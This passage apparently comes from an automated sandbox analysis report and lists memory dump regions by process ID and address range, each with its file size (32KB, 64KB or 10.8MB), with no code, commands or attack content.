                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                  • memory/4776-531-0x000002E3D6530000-0x000002E3D6540000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                  • memory/4776-533-0x00007FFE7B1C0000-0x00007FFE7BC82000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    10.8MB

                                                                                                                                                                                                                  • memory/4776-530-0x00007FFE7B1C0000-0x00007FFE7BC82000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    10.8MB

                                                                                                                                                                                                                  • memory/4856-316-0x00007FFE771C0000-0x00007FFE77C82000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    10.8MB

                                                                                                                                                                                                                  • memory/4856-318-0x000002864B3A0000-0x000002864B3B0000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                  • memory/4856-323-0x000002864B3A0000-0x000002864B3B0000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                  • memory/4856-317-0x000002864B3A0000-0x000002864B3B0000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                  • memory/4856-333-0x00007FFE771C0000-0x00007FFE77C82000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    10.8MB

                                                                                                                                                                                                                  • memory/4856-326-0x000002864B3A0000-0x000002864B3B0000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                  • memory/5428-462-0x00007FFE771C0000-0x00007FFE77C82000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    10.8MB

                                                                                                                                                                                                                  • memory/5428-433-0x00007FFE771C0000-0x00007FFE77C82000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    10.8MB

                                                                                                                                                                                                                  • memory/5428-434-0x0000018CF98A0000-0x0000018CF98B0000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                  • memory/5568-483-0x00007FFE771C0000-0x00007FFE77C82000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    10.8MB

                                                                                                                                                                                                                  • memory/5568-470-0x000001E528F30000-0x000001E528F38000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    32KB

                                                                                                                                                                                                                  • memory/5568-453-0x000001E510BC0000-0x000001E510BD0000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                  • memory/5568-443-0x00007FFE771C0000-0x00007FFE77C82000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    10.8MB

                                                                                                                                                                                                                  • memory/5568-444-0x000001E510BC0000-0x000001E510BD0000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                  • memory/5828-571-0x0000027A5A8D0000-0x0000027A5A8E0000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                  • memory/5828-570-0x00007FFE7B1C0000-0x00007FFE7BC82000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    10.8MB

                                                                                                                                                                                                                  • memory/5828-572-0x0000027A5A8D0000-0x0000027A5A8E0000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                  • memory/5828-574-0x00007FFE7B1C0000-0x00007FFE7BC82000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    10.8MB